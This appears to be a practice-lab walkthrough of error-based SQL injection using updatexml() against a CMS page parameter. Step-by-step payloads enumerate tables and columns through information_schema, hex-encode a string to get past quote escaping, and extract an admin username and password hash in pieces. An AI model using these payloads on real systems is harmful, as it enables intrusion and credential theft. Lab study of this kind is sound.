cms shooting range error injection
Injection using updatexml
First query the database name and get the database name cms
?id=33 and updatexml(1,concat(0x5e,(select database()),0x5e),1)
Check the tables in the database. The table names and column names in the database are saved in the information_schema database. Check the information_schema database table. First check how many tables there are in cms. The result is 8 tables.
?id=33 and updatexml(1,concat(0x5e,(select count(*) from information_schema.tables where table_schema=database()),0x5e),1)
Use paging to view the content table_name. There are 8 tables in the previous statistics cms, but the echo can only echo one row.
limit 0,1: view the first line of page 0
limit 1,1: view the first line of page 1
?id=33 and updatexml(1,concat(0x5e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x5e),1)
cms_article
?id=33 and updatexml(1,concat(0x5e,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x5e),1)
cms_category
cms_file
cms_friendlink
cms_message
cms_notice
cms_page
cms_users
View the column names in the users table, but the single quotes are escaped, we can convert the content in the single quotes into hexadecimal content
http://192.168.16.136/cms/show.php?id=33 and updatexml(1,concat(0x5e,(select column_name from information_schema.columns where table_schema=database() and table_name='cms_users' limit 0,1),0x5e),1)
?id=33 and updatexml(1,concat(0x5e,(select column_name from information_schema.columns where table_schema=database() and table_name=0x636d735f7573657273 limit 0,1),0x5e),1)
userid
username
password
Get the database name, table name and column name, view the user name and password
?id=33 and updatexml(1,concat(0x5e,(select username from cms_users limit 0,1),0x5e),1)
Get username: admin
There may be a length limit when data is echoed. Use the substr() function to output the content to be queried in batches. The first bit in the sorting of strings enclosed by the substr() function is 1, but the first bit in the usual sorting of strings is 0.
First check how long the password is, the password length is 32 characters
?id=33 and updatexml(1,concat(0x5e,(select length(password) from cms_users limit 0,1),0x5e),1)
Display the first 16 digits first, then the last 16 digits
?id=33 and updatexml(1,concat(0x5e,(select substr(password,1,16) from cms_users limit 0,1),0x5e),1) #substr(password,1,16)表示password第一位开始输出,输出到第十六位
e10adc3949ba59ab
?id=33 and updatexml(1,concat(0x5e,(select substr(password,17,32) from cms_users limit 0,1),0x5e),1) #substr(password,17,32)表示password第十七位开始输出,输出到第三十二位
be56e057f20f883e
e10adc3949ba59abbe56e057f20f883e
